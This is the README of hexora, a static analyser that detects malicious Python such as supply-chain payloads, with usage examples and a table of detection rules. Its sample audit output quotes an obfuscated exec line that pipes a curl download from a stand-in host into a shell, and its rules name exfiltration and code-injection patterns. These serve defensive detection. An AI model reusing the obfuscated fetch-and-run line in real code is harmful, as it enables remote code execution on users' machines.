hexora

March 28, 2026

Hexora is a static analysis tool designed to detect malicious and harmful patterns in Python code.

It can be used to:

  • Audit project dependencies to catch potential supply-chain attacks
  • Detect malicious scripts found on platforms like Pastebin, GitHub, or open directories
  • Analyze IoC files from past security incidents
  • Audit new packages uploaded to PyPI.

Examples

For output examples, please see the docs/examples.md file.

Installation

Using Python

Requires Python 3.9+.

pip install hexora

Using uv:

uv tool install hexora

Usage

hexora --help

Audit single file

>  hexora audit test.py

warning[HX2000]: Reading from the clipboard can be used to exfiltrate sensitive data.
  ┌─ resources/test/test.py:3:8

1 import pyperclip
2
3 data = pyperclip.paste()
        ^^^^^^^^^^^^^^^^^ HX2000

  = Confidence: High
    Help: Clipboard access can be used to exfiltrate sensitive data such as passwords and keys.

warning[HX3000]: Possible execution of unwanted code
   ┌─ resources/test/test.py:20:1

19 (_ceil, _random, Math,), Run, (Floor, _frame, _divide) = (exec, str, tuple), map, (ord, globals, eval)
20 _ceil("import subprocess;subprocess.call(['curl -fsSL https://example.com/b.sh | sh'])")
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3000

Audit directory

hexora audit --output-format terminal resources/test/

Audit packages from virtual environment

hexora audit --exclude HX5020,HX5030,HX5040,HX5050,HX5060 --min-confidence high .venv/lib/python3.11/site-packages/

Here python3.11 is the Python version used by the virtual environment.

Tips:

  • Use --exclude to suppress certain rule codes (e.g., noisy imports) for a given run
  • Use --min-confidence to focus on high-confidence findings only.

Confidence indicates how likely a given piece of code is to be malicious. Some libraries and code snippets are used for legitimate purposes, and it is hard to distinguish legitimate use cases from malicious ones. That is why some matches have a low confidence level.

Some rules can report different confidence levels, so avoid excluding many rules by code unless you are very confident they are noise. For example, code and shell execution can have medium, high, or very high confidence, depending on how the code is executed. If we detect an obfuscation attempt, we elevate the confidence.

For example, this code will have a high confidence:

globals()["__builtins__"].eval("print(123)")

Usage in Python

>>> import hexora
>>> results = hexora.audit_path("/Projects/hexora/resources/test/")
>>> len(results)
15
>>> results[0]
{'items': [{'confidence': 'low',
            'description': 'pyperclip can be used to copy and paste data from '
                           'the clipboard.',
            'label': 'pyperclip',
            'location': (7, 16),
            'rule': 'HX5010'},
           {'confidence': 'high',
            'description': 'Reading from the clipboard can be used to '
                           'exfiltrate sensitive data.',
            'label': 'pyperclip.paste',
            'location': (25, 42),
            'rule': 'HX2000'}],
 'path': '/Projects/hexora/resources/test/clipboard_01.py'}
>>> # Single file audit
>>> result = hexora.audit_file("/Projects/hexora/resources/test/clipboard_01.py")
>>> ...
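The result structure above (a list of dicts with a `path` and an `items` list) is easy to post-process. The following script is an added example, not part of the hexora project: it applies the same `--min-confidence` and `--exclude` filtering the CLI offers, counts findings per rule code so noisy rules can be spotted before excluding them, and exits non-zero when anything remains, which makes it usable as a CI gate over a virtual environment. The sample results are constructed in the shape shown above, and the spelling of the top confidence level ("very high") is an assumption.

```python
"""Gate a dependency audit on hexora's Python API (added example, not hexora's own code)."""
from collections import Counter

# Rank of each confidence string in hexora output; "very high" spelling is assumed.
CONFIDENCE_RANK = {"low": 0, "medium": 1, "high": 2, "very high": 3}


def filter_findings(results, min_confidence="high", exclude=()):
    """Flatten hexora results into (path, rule, label, confidence) tuples,
    keeping only findings at or above min_confidence and not in excluded rule codes."""
    threshold = CONFIDENCE_RANK[min_confidence]
    excluded = set(exclude)
    findings = []
    for entry in results:
        for item in entry["items"]:
            if item["rule"] in excluded:
                continue
            if CONFIDENCE_RANK.get(item["confidence"], 0) < threshold:
                continue
            findings.append((entry["path"], item["rule"], item["label"], item["confidence"]))
    return findings


def summarize(findings):
    """Count findings per rule code; a rule that dominates the count is a candidate for --exclude."""
    return Counter(rule for _, rule, _, _ in findings)


# Constructed sample in the shape of hexora.audit_path() output; not real audit output.
SAMPLE_RESULTS = [
    {"path": "/Projects/hexora/resources/test/clipboard_01.py",
     "items": [
         {"confidence": "low", "description": "pyperclip can be used to copy and paste data.",
          "label": "pyperclip", "location": (7, 16), "rule": "HX5010"},
         {"confidence": "high", "description": "Reading from the clipboard can exfiltrate data.",
          "label": "pyperclip.paste", "location": (25, 42), "rule": "HX2000"}]},
    {"path": "/Projects/hexora/resources/test/socket_01.py",
     "items": [
         {"confidence": "low", "description": "Suspicious socket import.",
          "label": "socket", "location": (0, 13), "rule": "HX5050"}]},
]

if __name__ == "__main__":
    import sys
    try:
        import hexora  # real API from the README; falls back to the sample when not installed
        results = hexora.audit_path(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_RESULTS
    except ImportError:
        results = SAMPLE_RESULTS
    found = filter_findings(results, min_confidence="high", exclude=("HX5020", "HX5030"))
    for path, rule, label, conf in found:
        print(f"{path}: {rule} {label} ({conf})")
    print("per-rule counts:", dict(summarize(found)))
    sys.exit(1 if found else 0)
```

Run it as `python gate.py .venv/lib/python3.11/site-packages/` to audit an environment; without an argument it processes the embedded sample.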

Testing Against Malicious Dataset

When developing new rules, you can use existing malicious datasets such as malicious-software-packages-dataset.

After cloning, point the benchmarking tool to the dataset directory:

cargo run --release benchmark malicious-software-packages-dataset/samples/pypi/ --print-missing --exclude-path data/excluded.txt  --min-confidence high

Available rules

New rules are added regularly.

Right now, the following rules are available:

| Code | Name | Description |
|------|------|-------------|
| HX1000 | AppEnumeration | Suspicious application enumeration. |
| HX1010 | BrowserEnumeration | Suspicious browser enumeration (apps, cookies, history, etc.). |
| HX1020 | PathEnumeration | Suspicious path enumeration. |
| HX1030 | OSFingerprint | Suspicious OS fingerprinting. |
| HX2000 | ClipboardRead | Reading from the clipboard. |
| HX2010 | EnvAccess | Access to a sensitive environment variable. |
| HX2020 | ScreenshotCapture | Capturing screenshots from the display. |
| HX3000 | CodeExec | Possible code execution. |
| HX3010 | ShellExec | Execution of a shell command. |
| HX3040 | DLLInjection | Possible DLL injection. |
| HX3050 | DangerousExec | Execution of potentially dangerous command inside a shell command. |
| HX3060 | SuspiciousCall | Suspicious function call. |
| HX4000 | ObfuscatedShellExec | Execution of an obfuscated shell command. |
| HX4010 | ObfuscatedCodeExec | Execution of obfuscated code. |
| HX5000 | DunderImport | Suspicious use of __import__. |
| HX5010 | SuspiciousImport | Suspicious import. |
| HX5020 | CtypesImport | Suspicious ctypes import. |
| HX5030 | PickleImport | Suspicious pickle import. |
| HX5040 | StructImport | Suspicious struct import. |
| HX5050 | SocketImport | Suspicious socket import. |
| HX5060 | MarshalImport | Suspicious marshal import. |
| HX6000 | Base64String | Long Base64-encoded string detected; possible code obfuscation. |
| HX6010 | HexedLiterals | List of hex-encoded literals detected; possible payload. |
| HX6020 | HexedString | Long hex-encoded string detected; possible payload. |
| HX6030 | IntLiterals | Large list of integer literals detected; possible code obfuscation. |
| HX6040 | CVEInLiteral | Literal contains a CVE identifier. |
| HX6050 | SuspiciousLiteral | Suspicious literal detected; possible data enumeration. |
| HX6060 | PathTraversal | Suspicious path traversal. |
| HX6070 | BrowserExtension | Enumeration of sensitive browser extensions. |
| HX6080 | WebHook | Suspicious webhook detected. Possible data exfiltration. |
| HX7000 | SuspiciousFunctionName | Suspicious function name. |
| HX7010 | SuspiciousParameterName | Suspicious parameter name. |
| HX7020 | SuspiciousVariable | Suspicious variable name. |
| HX9000 | DataExfiltration | Potential data exfiltration. |
| HX8000 | BinaryDownload | Suspicious binary download. |
| HX8010 | BuiltinsVariable | Suspicious builtin variable usage. |
| HX8020 | SuspiciousComment | Suspicious comment. |
| HX8030 | SuspiciousWrite | Suspicious write to the filesystem. |

Credits

For parsing, we use the AST parser from the ruff library.